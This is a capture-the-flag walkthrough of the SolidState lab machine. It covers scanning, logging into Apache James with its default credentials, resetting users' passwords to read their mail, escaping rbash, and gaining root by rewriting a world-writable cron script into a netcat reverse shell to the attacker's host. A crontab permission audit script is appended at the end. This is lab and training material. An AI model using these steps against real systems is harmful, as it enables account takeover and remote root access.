
SOLIDSTATE: 1

About the machine

Description:
It was originally created for HackTheBox

Vulnhub page:
https://www.vulnhub.com/entry/solidstate-1,261/

Download page:
https://download.vulnhub.com/solidstate/SolidState.zip

Walkthrough

Let's start by locating the machine on the network.

┌──(root💀kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:97:a8:e4, IPv4: 192.168.6.132
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08   VMware, Inc.
192.168.6.2 00:50:56:f3:da:b0   VMware, Inc.
192.168.6.142   00:0c:29:0c:40:ff   VMware, Inc.
192.168.6.254   00:50:56:e2:4d:69   VMware, Inc.

21 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.939 seconds (132.03 hosts/sec). 4 responded

Let's continue with an nmap scan.

[*] Scan: 182
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-13 17:13 EDT
Nmap scan report for 192.168.6.142
Host is up (0.0010s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (192.168.6.132 [192.168.6.132]), PIPELINING, ENHANCEDSTATUSCODES, 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
MAC Address: 00:0C:29:0C:40:FF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.02 ms 192.168.6.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.63 seconds

Let's try to gather information from the ports other than HTTP. After reviewing the nmap output I ran an exploit search and found the results below.

┌──(root💀kali)-[~/oscp/solid]
└─# searchsploit JAMES  2.3.2
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                              |  Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)                                        | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                                                        | linux/remote/35513.py
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root💀kali)-[~/oscp/solid]
└─# cp $(locate linux/remote/35513.py) .

┌──(root💀kali)-[~/oscp/solid]
└─# ls
35513.py

┌──(root💀kali)-[~/oscp/solid]
└─# cat 35513.py
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'
...

When I saw the line "credentials to James Remote Administration Tool (Default - root/root)", I wanted to try it, and it worked.


┌──(root💀kali)-[~/oscp/solid]
└─# nc 192.168.6.142 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Unknown command 
setpassword james root 
Password for james reset
setpassword thomas root
Password for thomas reset
setpassword john root
Password for john reset
setpassword mindy root
Password for mindy reset
setpassword mailadmin root
Password for mailadmin reset
exit
Unknown command exit
^C

Now I can read everyone's mail.


┌──(root💀kali)-[~/oscp/solid]
└─# telnet 192.168.6.142 110
Trying 192.168.6.142...
Connected to 192.168.6.142.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user john
+OK
pass root
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.
^C^X
exit
^C^C^C^C  
help
^C^X^X^XConnection closed by foreign host.

Let's see whether we can obtain a password.


┌──(root💀kali)-[~/oscp/solid]
└─# telnet 192.168.6.142 110
Trying 192.168.6.142...
Connected to 192.168.6.142.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user mindy
+OK
pass root
+OK Welcome mindy
list
+OK 2 1945
1 1109
2 836
.
rety 1
-ERR
retr 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
retr 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

Great. With that, I tried connecting over SSH and got my first flag, but I ran into rbash.

┌──(root💀kali)-[~/oscp/solid]
└─# ssh mindy@192.168.6.142
The authenticity of host '192.168.6.142 (192.168.6.142)' can't be established.
ECDSA key fingerprint is SHA256:njQxYC21MJdcSfcgKOpfTedDAXx50SYVGPCfChsGwI0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.142' (ECDSA) to the list of known hosts.
mindy@192.168.6.142's password: 
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ whoami
-rbash: whoami: command not found
mindy@solidstate:~$ ls
bin  user.txt
mindy@solidstate:~$ cat user.txt
914d0a4ebc1777889b5b89a23f556fd75
mindy@solidstate:~$ 

I was able to bypass it as follows.


┌──(root💀kali)-[~/oscp/solid]
└─# ssh mindy@192.168.6.142 -t "bash --noprofile"
mindy@192.168.6.142's password: 
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ pwd
/home/mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cd ..
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james  mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ ls
james  mindy
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$ cd james
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home/james$ alias ls="ls -al"

After poking around inside, I found a file owned by root that I could modify. I modified the file in the hope that it had been added to a crontab. In fact I was sure it was in the crontab, because I had been dumping my earlier search output under the /tmp folder and had seen it get deleted after a while.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ find / -writable -type f -exec ls -al {} \; 2>/dev/null | tee result
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat result | grep root | grep py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ nano /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ 
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ nano /opt/tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('nc 192.168.6.132 1822 -e /bin/bash')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ 

We can verify it as follows.

# crontab -l
crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/3 * * * * python /opt/tmp.py

# whoami
whoami
root
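The privilege escalation above works because a script that root's cron runs every three minutes (/opt/tmp.py, mode 777) can be rewritten by an unprivileged user. The following is an added example and not code from the walkthrough: a small Python audit that parses a crontab, pulls out the absolute paths each command references, and flags any path that a user other than root owns or that group/other can write to. The crontab text and the file-metadata table are constructed for the example (modelled on the /opt/tmp.py entry seen on the box); `stat_meta` is a hypothetical helper showing how the same table would be built from a live filesystem.

```python
"""Audit a root crontab for commands whose files can be modified by non-root users.
Added example, not part of the original walkthrough; the crontab and file metadata
below are constructed so the script runs offline."""
import os
import re
import shlex
import stat

# Constructed sample root crontab, modelled on the one shown in the walkthrough.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
*/3 * * * * python /opt/tmp.py
0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
@daily /usr/local/bin/rotate-logs.sh
"""

# Constructed file metadata: path -> (owner, permission bits). In a live audit this
# would come from os.stat() (see stat_meta below); here it is hard-coded.
SAMPLE_META = {
    "/opt/tmp.py": ("root", 0o777),                     # world-writable: the finding on this box
    "/var/backups/home.tgz": ("root", 0o600),           # fine: only root can touch it
    "/usr/local/bin/rotate-logs.sh": ("mindy", 0o755),  # owned by an unprivileged user
}

# Either an @shortcut (e.g. @daily) or five schedule fields, then the command.
CRON_LINE = re.compile(r"^(@\w+|(?:\S+\s+){5})(.+)$")


def parse_crontab(text):
    """Return (schedule, command) pairs, skipping comments, blank lines and VAR=value lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group(1).strip(), m.group(2).strip()))
    return entries


def script_paths(command):
    """Absolute paths referenced by a cron command (interpreter, script and arguments)."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes; fall back to a plain split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def writable_by_others(mode):
    """True if the group or other write bit is set."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def find_risky(entries, meta, cron_user="root"):
    """Flag referenced files that someone other than cron_user could modify."""
    findings = []
    for schedule, command in entries:
        for path in script_paths(command):
            if path not in meta:  # unknown path: nothing to judge
                continue
            owner, mode = meta[path]
            reasons = []
            if owner != cron_user:
                reasons.append("owned by %s, not %s" % (owner, cron_user))
            if writable_by_others(mode):
                reasons.append("mode %o grants group/other write" % (mode & 0o777))
            if reasons:
                findings.append({"path": path, "schedule": schedule,
                                 "command": command, "reasons": reasons})
    return findings


def stat_meta(paths):
    """Hypothetical live variant: build the metadata table from the filesystem.
    Paths that do not exist are skipped."""
    import pwd  # Unix-only; imported here so the offline part runs anywhere
    meta = {}
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            continue
        meta[p] = (pwd.getpwuid(st.st_uid).pw_name, stat.S_IMODE(st.st_mode))
    return meta


if __name__ == "__main__":
    for f in find_risky(parse_crontab(SAMPLE_CRONTAB), SAMPLE_META):
        print("%s (%s): %s" % (f["path"], f["schedule"], "; ".join(f["reasons"])))
```

The audit deliberately checks every absolute path a command references, not only the script, so an output file such as a tar archive shows up as a candidate too; review the list rather than treating every line as a confirmed issue. On this box the fix for the real finding is the obvious one: the script root runs from cron must be owned by root and not writable by anyone else.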